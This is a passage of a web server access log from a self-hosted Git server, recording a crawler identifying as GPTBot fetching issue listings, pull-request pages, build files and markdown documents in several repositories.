AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:19:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:19:04:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:19:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:19:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=closed&type=all" -[17/Feb/2026:19:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=latest&state=all&type=all" -[17/Feb/2026:19:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:19:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:04:57 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:04:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:04:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:05:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 74.7.227.38] [Length 11200] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:19:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:19:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15268] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:19:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:19:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:19:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:19:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:19:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:19:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11135] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:19:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:19:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118258] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72665] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72704] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=open&type=all" -[17/Feb/2026:19:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=oldest&state=open&type=all" -[17/Feb/2026:19:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118393] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71837] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71836] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71842] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118428] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71838] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 